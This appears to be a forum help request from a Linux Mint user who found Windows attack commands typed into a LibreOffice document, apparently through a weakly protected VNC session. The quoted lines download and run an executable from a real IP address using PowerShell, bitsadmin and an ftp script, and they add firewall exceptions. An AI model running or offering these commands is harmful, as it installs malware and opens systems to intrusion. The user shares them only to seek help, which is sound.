I was AFK for a few hours. This is what I saw in my LibreOffice document when I returned to my laptop:
cmd.exe /c PoweExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://92.63.197.153/cawk.exe','%temp%\40006605040.exe');Start-Process '%temp%\40006605040.exe'
rcmd.exe /c bitsadmin /transfer getitman /download /priority high http://92.63.197.153/cawk.exe %temp%\4950606004.exe&start %temp%\4950606004.exe
rcmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe “ok” ENABLE&netsh advfirewall firewall add rule name=”ok” dir=in action=allow program=”C:\Windows\System32\ftp.exe” enable=yes
rcmd.exe /c “cd %temp%&@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get cawk.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start cawk.exe”
I am on Linux Mint, so the commands (Windows; PowerShell?) were obviously not targeted individually against my system but rather came from a random attack. Still, I wonder how this could happen. I was connected to the VPN network of my university during that time (using Cisco AnyConnect). I also had VNC running with a rather mediocre password. This is my only guess. Do you have any ideas? Should I be worried that my system is infected?